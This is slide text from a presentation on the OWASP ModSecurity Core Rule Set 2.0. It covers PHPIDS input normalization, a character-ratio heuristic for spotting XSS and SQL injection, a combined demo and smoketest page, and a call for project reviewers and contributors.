The t: list (urlDecodeUni through lowercase) is the chain of normalization functions.
CRS 2.0 – PHPIDS Conversion/Normalization
PHPIDS combats evasions by both converting and
normalizing input data before applying their regular
expressions
https://svn.php-ids.org/svn/trunk/lib/IDS/Converter.php
Handles evasion issues such as:
Comments
Newlines
Charcode
Normalize Quotes
Current CRS approach is to create rules to increase the
anomaly score when these are encountered vs.
attempting to normalize
CRS 2.0 – PHPIDS Centrifuge
Negative security approach to combating XSS and SQL
Injection is doomed to fail…
Unlimited ways to write functionally equivalent code
Obfuscation methods, however, often have certain characteristics
PHPIDS has an interesting approach to identify attack
payloads through heuristics
Analysis of the use of special characters
Ratio between the count of the word characters, spaces,
punctuation and the non word characters
If <3.50 = malicious
Normalization and stripping of any word character and
spaces including line breaks, tabs and carriage returns
Regex check in default_filters.xml catches results
Facilitate Community Collaboration
CRS 2.0 – CRS Demo/Smoketest
ModSecurity/CRS finally has its own Demo/Smoketest
page
http://www.modsecurity.org/demo/
CRS 2.0 – CRS/PHPIDS Demo/Smoketest
CRS demo page is actually a front-end for the PHPIDS
smoketest page
http://demo.php-ids.org/
Request will go through CRS page first and then we
proxy the request to the PHPIDS page
We then inspect the inbound with the outbound and
provide results
CRS detected an attack
CRS did not find anything malicious but PHPIDS did
Neither CRS nor PHPIDS found anything malicious
A link is provided to report false negatives to our JIRA
ticketing system
https://www.modsecurity.org/tracker/browse/CORERULES
CRS 2.0 – CRS Demo/Smoketest
Call for Community Help
CRS 2.0 – Call for Community Help
We have made great strides with CRS v2.0 but there is
still much work to be done
Current OWASP Project Status is Alpha
Need some help to move it to Beta -> Release Quality
Need Project Reviewers
Test out the CRS demo page and report any issues found
either to the mail-list or to JIRA
Cool project idea
Port the PHPIDS Converter.php code into Lua for use in
ModSecurity
Please sign up on our project mail-list if you want to help
https://lists.owasp.org/mailman/listinfo/owasp-modsecurity-corerule-set
Thank You!
Ryan Barnett
[email protected]